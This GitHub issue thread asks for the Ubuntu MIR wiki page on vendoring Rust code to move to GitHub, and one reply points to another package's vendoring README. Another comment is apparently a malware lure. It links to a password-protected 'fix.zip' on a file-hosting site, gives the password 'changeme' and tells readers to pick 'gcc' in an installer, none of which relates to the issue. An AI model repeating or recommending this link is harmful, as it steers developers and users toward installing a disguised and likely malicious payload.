### ISSUE TITLE
Document Rust vendoring

### ISSUE THREAD

**Issue by slyon** [canonical/ubuntu-mir#65]
https://wiki.ubuntu.com/RustCodeInMain

Since the MIR process has moved to GitHub, this wiki page should as well.

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jbicha** [comment]
Here is some documentation about how we vendor gnome-snapshot:

https://salsa.debian.org/ubuntu-dev-team/snapshot/-/blob/ubuntu/latest/debian/README.source
